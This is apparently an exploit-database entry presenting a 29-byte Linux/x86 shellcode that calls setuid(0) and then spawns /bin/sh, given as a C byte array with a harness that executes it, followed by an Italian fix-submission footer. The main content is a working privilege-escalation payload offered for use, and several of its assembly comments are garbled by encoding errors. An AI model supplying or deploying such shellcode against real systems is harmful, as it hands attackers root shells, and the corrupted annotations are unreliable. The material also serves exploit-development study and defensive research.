Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)

2009-01-01 12:05:09

/* 29 byte-long setuid(0) + execve("/bin/sh",...) shellcode
by Marcin Ulikowski <[email protected]> */

#include <unistd.h>

char shellcode[] =
"\x31\xdb" /* xor ëx,ëx */
"\x8d\x43\x17" /* lea 0x17(ëx),êx */
"\xcd\x80" /* int $0x80 */
"\x53" /* push ëx */
"\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */
"\x89\xe3" /* mov %esp,ëx */
"\x50" /* push êx */
"\x53" /* push ëx */
"\x89\xe1" /* mov %esp,ìx */
"\x99" /* cltd */
"\xb0\x0b" /* mov $0xb,%al */
"\xcd\x80"; /* int $0x80 */

int main(void) {
void(*f)()=(void*)shellcode;f();
return 0;
}

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.